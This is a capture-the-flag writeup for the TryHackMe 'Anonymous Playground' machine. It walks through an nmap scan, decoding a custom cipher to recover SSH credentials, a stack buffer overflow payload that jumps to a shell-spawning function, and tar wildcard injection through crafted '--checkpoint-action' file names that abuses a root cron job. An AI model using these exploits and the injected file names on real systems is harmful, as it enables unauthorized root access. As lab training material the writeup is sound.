Anonymous Playground: THM writeup

Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 60:b6:ad:4c:3e:f9:d2:ec:8b:cd:3b:45:a5:ac:5f:83 (RSA)
| 256 6f:9a:be:df:fc:95:a2:31:8f:db:e5:a2:da:8a:0c:3c (ECDSA)
|_ 256 e6:98:52:49:cf:f2:b8:65:d7:41:1c:83:2e:94:24:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/zYdHuAKjP
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proving Grounds
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HomePage
Operatives.php
hE = m
zA = a
dC = g
fH = n
zA = a
The cipher looks like:

final = ord(second_character) - 64 + ord(first_character)
# If the character lies above "z" in the ASCII table, wrap around
if final > ord("z"):
    final = (final % ord("z")) + ord("a") - 1
chr(final)
  • First, convert the ASCII value of the second character to its alphabetic number,
    i.e. 'A': 1, 'B': 2, ...
  • Add this to the ASCII value of the first character and take the resulting character.
  • If the result is higher than the ASCII value of 'z', the amount by which it exceeds 'z' is counted on from 'a' (so one past 'z' wraps to 'a').
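Here is the cipher above as a small Python decoder (an added example, not code from the original writeup): `decode_pair`, `decode_name` and `SAMPLE_ENCODED` are my own names, and the sample string is just the five pairs quoted above concatenated, on the assumption that every encoded name is a run of such lower/upper pairs.

```python
def decode_pair(pair: str) -> str:
    """Decode one two-character group of the Operatives.php cipher.

    The second (upper-case) character becomes its alphabet index ('A' == 1),
    which is added to the ASCII value of the first (lower-case) character.
    Results past 'z' wrap around to the start of the lower-case alphabet.
    """
    if len(pair) != 2:
        raise ValueError(f"expected a two-character group, got {pair!r}")
    first, second = pair
    if not (first.islower() and second.isupper()):
        raise ValueError(f"expected a lower+upper pair, got {pair!r}")
    final = ord(second) - 64 + ord(first)  # ord('A') - 64 == 1
    if final > ord("z"):
        # Wrap: the excess over 'z' is re-based on 'a' (123 -> 'a', 124 -> 'b', ...)
        final = (final % ord("z")) + ord("a") - 1
    return chr(final)


def decode_name(encoded: str) -> str:
    """Decode a whole encoded name, one two-character group at a time."""
    if len(encoded) % 2:
        raise ValueError("encoded name must have an even number of characters")
    return "".join(decode_pair(encoded[i:i + 2]) for i in range(0, len(encoded), 2))


# Constructed sample: the five pairs quoted in the writeup, concatenated.
SAMPLE_ENCODED = "hEzAdCfHzA"

if __name__ == "__main__":
    print(decode_name(SAMPLE_ENCODED))  # magna
```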
magna :: <Password>

Inside the system

main function decompiled using Ghidra.
call_bash function decompiled using Ghidra.

Buffer overflow

$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" | ./hacktheworld
$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" > ro
# Store the exploit in a file
$ gdb ./hacktheworld # run gdb
(gdb) break call_bash # set breakpoint call_bash function
(gdb) run < ro # run the program with the input from ro
Starting program: /home/magna/hacktheworld < ro
Breakpoint 1, 0x000000000040065b in call_bash ()
(gdb) c
Continuing.
Who do you want to hack?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
Breakpoint 2, 0x00000000004006d0 in call_bash ()
# we are hitting the second breakpoint
(gdb) s
Single stepping until exit from function call_bash,
which has no line number information.
__libc_system (line=0x400803 "/bin/sh") at ../sysdeps/posix/system.c:180
180 ../sysdeps/posix/system.c: No such file or directory.
(gdb)
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
*/1 *   * * *   root    cd /home/spooky && tar -zcf /var/backups/spooky.tgz *
$ echo "ro" > "--checkpoint=1"
$ echo "ro" > "--checkpoint-action=exec=sh ro.sh"
$ echo "chmod 777 /root" > ro.sh

Roshan Guragain
Infosec Enthusiast